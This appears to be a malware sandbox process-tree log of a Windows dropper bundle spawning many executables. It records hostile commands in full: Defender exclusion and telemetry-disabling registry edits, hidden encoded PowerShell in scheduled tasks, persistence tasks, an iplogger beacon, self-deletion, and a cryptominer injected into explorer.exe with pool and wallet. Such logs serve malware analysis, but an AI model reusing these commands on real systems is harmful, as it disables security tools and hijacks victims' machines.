C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵PID:7068
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵PID:6024
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵PID:7784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵PID:8004
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵PID:5472
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵PID:7424
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵PID:7600
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵PID:7728
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gebfJDaer" /SC once /ST 00:05:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:7444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 01:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\rjQyNqP.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:5028
-
-
-
-
-
C:\Users\Admin\Documents\MQQniL3nVAJGvnEG3rlhokiW.exe"C:\Users\Admin\Documents\MQQniL3nVAJGvnEG3rlhokiW.exe" /mixtwo8⤵
- Executes dropped EXE
PID:6220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6220 -s 2569⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5968
-
-
-
C:\Users\Admin\Documents\uLyNXR2rKJA12xllJQXgTAdi.exe"C:\Users\Admin\Documents\uLyNXR2rKJA12xllJQXgTAdi.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1152 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 2569⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6020
-
-
-
C:\Users\Admin\Documents\bMq1vc4oZncxHmzpLubp0EnH.exe"C:\Users\Admin\Documents\bMq1vc4oZncxHmzpLubp0EnH.exe"8⤵
- Executes dropped EXE
PID:2156 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5628
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 21208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6992
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5332
-
-
-
C:\Users\Admin\Documents\lWqFOBNzObqshYcVbU9EPdxn.exe"C:\Users\Admin\Documents\lWqFOBNzObqshYcVbU9EPdxn.exe"6⤵
- Executes dropped EXE
PID:5564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1104
-
-
-
C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"C:\Users\Admin\Documents\uovrLnOqiZlNa82B7YD2cASD.exe"6⤵PID:2156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 2407⤵
- Program crash
PID:2896
-
-
-
C:\Users\Admin\Documents\VDKr3kJPXY5MiEh2sgBh3rKq.exe"C:\Users\Admin\Documents\VDKr3kJPXY5MiEh2sgBh3rKq.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5816 -
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
PID:6948
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:7048
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
- Executes dropped EXE
PID:7092
-
-
-
C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"6⤵PID:5956
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\gubOpckawV9YiBQZQEGZyim0.exe"7⤵PID:6620
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:5312
-
-
-
-
C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe"C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe"6⤵PID:6004
-
C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exeC:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe7⤵
- Executes dropped EXE
PID:5908
-
-
C:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exeC:\Users\Admin\Documents\vJsRieSJjWMc0EdygYU_6eeY.exe7⤵
- Executes dropped EXE
PID:1896
-
-
-
C:\Users\Admin\Documents\t0TWzXF0UmHxn2kAnmhu_AuL.exe"C:\Users\Admin\Documents\t0TWzXF0UmHxn2kAnmhu_AuL.exe"6⤵
- Executes dropped EXE
PID:5972
-
-
C:\Users\Admin\Documents\F26HMOE0VyruSatwyckTLw9O.exe"C:\Users\Admin\Documents\F26HMOE0VyruSatwyckTLw9O.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5704
-
-
C:\Users\Admin\Documents\FElanqa0GqBIMxoehkuxM992.exe"C:\Users\Admin\Documents\FElanqa0GqBIMxoehkuxM992.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5340 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵PID:1852
-
-
-
-
C:\Users\Admin\Documents\bjR2Xj9UB1KeMGiahQDr2ahv.exe"C:\Users\Admin\Documents\bjR2Xj9UB1KeMGiahQDr2ahv.exe"6⤵
- Executes dropped EXE
PID:1212
-
-
C:\Users\Admin\Documents\emBhBCB9JrvjwUss_kimXWYl.exe"C:\Users\Admin\Documents\emBhBCB9JrvjwUss_kimXWYl.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5488
-
-
C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe"C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe"6⤵PID:5388
-
C:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exeC:\Users\Admin\Documents\emWhgHV8U1Es49MkR7UHHWse.exe7⤵
- Executes dropped EXE
PID:2424
-
-
-
C:\Users\Admin\Documents\7E47t5OZ9Y2AslGLa71zs0Ko.exe"C:\Users\Admin\Documents\7E47t5OZ9Y2AslGLa71zs0Ko.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5284
-
-
C:\Users\Admin\Documents\CbKGQ0u4To8yh2C9mP3J72a5.exe"C:\Users\Admin\Documents\CbKGQ0u4To8yh2C9mP3J72a5.exe"6⤵PID:6728
-
C:\Users\Admin\AppData\Roaming\6444653.scr"C:\Users\Admin\AppData\Roaming\6444653.scr" /S7⤵
- Executes dropped EXE
PID:5768
-
-
C:\Users\Admin\AppData\Roaming\1612556.scr"C:\Users\Admin\AppData\Roaming\1612556.scr" /S7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3248
-
-
C:\Users\Admin\AppData\Roaming\7310183.scr"C:\Users\Admin\AppData\Roaming\7310183.scr" /S7⤵PID:1272
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4660
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 15846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6576
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4596 -
C:\Users\Admin\AppData\Roaming\4957782.scr"C:\Users\Admin\AppData\Roaming\4957782.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Users\Admin\AppData\Roaming\7165322.scr"C:\Users\Admin\AppData\Roaming\7165322.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4924
-
-
C:\Users\Admin\AppData\Roaming\3379467.scr"C:\Users\Admin\AppData\Roaming\3379467.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5760
-
-
C:\Users\Admin\AppData\Roaming\8397358.scr"C:\Users\Admin\AppData\Roaming\8397358.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6792
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
PID:4660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 2606⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:6072 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:6984
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:4376
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
PID:4632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:5632
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:7992
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5956
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:7460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:5532
-
C:\ProgramData\3972948.exe"C:\ProgramData\3972948.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6704
-
-
C:\ProgramData\985091.exe"C:\ProgramData\985091.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6976
-
-
C:\ProgramData\1305362.exe"C:\ProgramData\1305362.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3824
-
-
C:\ProgramData\4140297.exe"C:\ProgramData\4140297.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
PID:3220
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5656 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5656 -s 17288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7080
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1888⤵
- Program crash
PID:6556
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6784 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6784 -s 17248⤵
- Program crash
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:6460 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7020
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5940 -
C:\Users\Admin\AppData\Local\Temp\is-4STRE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4STRE.tmp\setup_2.tmp" /SL5="$20308,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5192 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\is-JRUH8.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-JRUH8.tmp\setup_2.tmp" /SL5="$60260,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:5628
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:6220
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:6908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
PID:5152 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 2606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3872
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
PID:4748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6056
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5084
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
PID:4124
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun193fda712d9f1.exeSun193fda712d9f1.exe1⤵
- Executes dropped EXE
PID:4280
-
C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe1⤵
- Executes dropped EXE
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\is-N4P9M.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-N4P9M.tmp\Sun1966fb31dd5a07.tmp" /SL5="$3012E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS483EB0E0\Sun1966fb31dd5a07.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5208 -
C:\Users\Admin\AppData\Local\Temp\is-FSF83.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-FSF83.tmp\Ze2ro.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5600 -
C:\Program Files\Windows Photo Viewer\ZDDMHZDMRU\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\ZDDMHZDMRU\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5388 -
C:\Users\Admin\AppData\Local\Temp\is-MEDVM.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-MEDVM.tmp\ultramediaburner.tmp" /SL5="$302E4,281924,62464,C:\Program Files\Windows Photo Viewer\ZDDMHZDMRU\ultramediaburner.exe" /VERYSILENT5⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:6732 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵PID:5040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c2-d306f-526-acfa7-a02d19941c1c6\Vaehelysizhe.exe"C:\Users\Admin\AppData\Local\Temp\c2-d306f-526-acfa7-a02d19941c1c6\Vaehelysizhe.exe"4⤵PID:4256
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:7732 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6746f8,0x7ff8de674708,0x7ff8de6747186⤵PID:796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:26⤵PID:8124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:36⤵PID:6332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:16⤵PID:7828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:16⤵PID:5060
-
-
